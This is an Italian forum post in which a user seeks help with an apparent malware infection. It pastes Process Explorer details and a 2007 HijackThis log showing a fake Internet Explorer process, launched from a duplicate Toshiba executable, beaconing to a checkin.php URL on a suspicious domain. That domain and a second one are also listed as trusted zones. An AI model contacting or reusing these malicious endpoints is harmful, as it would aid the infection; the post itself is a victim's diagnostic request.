anzitutto, volevo fornirti un altro dato:
ho voluto analizzzare con Process Explorer i dettagli dei processi attivi, in particollare lo sdoppiamento del processo IEXPLORE.EXE
Non sono pratico nemmeno di ProcessExplorer, ma ho notato almeno 2 dettagli aprendo le Proprietà dei due processi omonimi:
Quest'ultimo "CeEKey.exe" è realtivo a "C:\Program Files\TOSHIBA\E-KEY\bak\CeEKey.exe"codice:- IEXPLORE.EXE autentico (Properties > Image): Path: C:\Program Files\Internet Explorer\IEXPLORE.EXE Command Line: "C:\Program Files\Internet Explorer\IEXPLORE.EXE" Parent: explorer.exe(2948) - IEXPLORE.EXE fasullo: Path: c:\program files\internet explorer\iexplore.exe Command Line: http://b.whataboutadog.com/123/checkin.php?cid=34340978&aid=10258&time=C:\DOCUME~1\miocomputer\LOCALS~1\Temp\\1191002468.dat&fw=2112&v=123&m=0&vm=0 Parent: CeEKey.exe(3108)
...per il resto, dll e chiavi registro connesse a tali processi, non ci capisco molto.
Ecco, poi, il log di HijackThis...però devo dirti che, lanciando "Do system scan and save log file", ho ricevuto un messaggio:
a parte questo avviso, che non ho ben capito, ti copio il log che ho ottenuto (ho cancellato l'indirizzo della rete aziendale):For some reason your system denied write access to the Hosts file. If any hijacked domains are in this file, HijackThis may not be able to fix this.
If that happens, you need to edit the file yuorself. To do this, click Start, Run and type:
notepad C:\WINDOWS\System32\drivers\etc\hosts
and press Enter. Find the line(s) HijackThis reports and delete them. Save the file as "hosts." (with quotes), and reboot.
For VISTA: simply exit HijackThis, right-click on the HijackThis icon, choose "Run as an Administrator"
PS:codice:Logfile of Trend Micro HijackThis v2.0.2 Scan saved at 23.31.21, on 28/09/2007 Platform: Windows XP SP1 (WinNT 5.01.2600) MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106) Boot mode: Normal Running processes: C:\WINDOWS\system32\Ati2evxx.exe C:\WINDOWS\Explorer.EXE C:\WINDOWS\AGRSMMSG.exe C:\WINDOWS\System32\TCtrlIOHook.exe C:\Program Files\CheckPoint\SecuRemote\bin\SR_GUI.exe C:\Program Files\TOSHIBA\TOSHIBA Controls\TFncKy.exe C:\Program Files\TOSHIBA\E-KEY\CeEKey.exe C:\Program Files\TOSHIBA\E-KEY\bak\CeEKey.exe C:\WINDOWS\System32\ctfmon.exe C:\Program Files\Messenger\msmsgs.exe C:\WINDOWS\System32\ctfmon.exe C:\WINDOWS\system32\NOTEPAD.EXE C:\Program Files\Internet Explorer\IEXPLORE.EXE c:\program files\internet explorer\iexplore.exe R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.it O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 5.0\Reader\ActiveX\AcroIEHelper.ocx O2 - BHO: DriveLetterAccess - {5CA3D70E-1895-11CF-8E15-001234567890} - C:\WINDOWS\system32\dla\tfswshx.dll O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx O4 - HKLM\..\Run: [AGRSMMSG] AGRSMMSG.exe O4 - HKLM\..\Run: [ATIPTA] C:\Program Files\ATI Technologies\ATI Control Panel\atiptaxx.exe O4 - HKLM\..\Run: [dla] C:\WINDOWS\system32\dla\tfswctrl.exe O4 - HKLM\..\Run: [TCtryIOHook] TCtrlIOHook.exe O4 - HKLM\..\Run: [TFncKy] TFncKy.exe O4 - HKLM\..\Run: [CeEKEY] C:\Program Files\TOSHIBA\E-KEY\CeEKey.exe O4 - HKLM\..\Run: [PestPatrol Control Center] C:\Program Files\PestPatrol\PPControl.exe O4 - HKLM\..\Run: [Realtime Monitor] C:\PROGRA~1\CA\ETRUST~1\realmon.exe -s O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\System32\ctfmon.exe O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background O4 - HKCU\..\Run: [DrvMon.exe] C:\WINDOWS\System32\DrvMon.exe O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\CTFMON.EXE (User 'SYSTEM') O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\CTFMON.EXE (User 'Default user') O4 - Global Startup: Microsoft Office.lnk = C:\Program Files\Microsoft Office\Office10\OSA.EXE O4 - Global Startup: PC Health.lnk = C:\Program Files\TOSHIBA\TOSHIBA Management Console\TOSHealthLocalS.vbs O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\Office10\EXCEL.EXE/3000 O9 - Extra button: Related - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINDOWS\web\related.htm O9 - Extra 'Tools' menuitem: Show &Related Links - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINDOWS\web\related.htm O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\MSMSGS.EXE O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\MSMSGS.EXE O15 - Trusted Zone: http://rete.[rete aziendale].it O15 - Trusted Zone: *.whataboutadog.com O15 - Trusted Zone: *.whataboutarabit.com O15 - Trusted Zone: http://rete.[rete aziendale].it (HKLM)
controllando, ho trovato molti files di sistema doppi (uno nella relativa cartella, e il doppione in una sottocartella BAK...e spesso hanno dimensioni diverse anche se identica data di creazione) ???
Rispondi quotando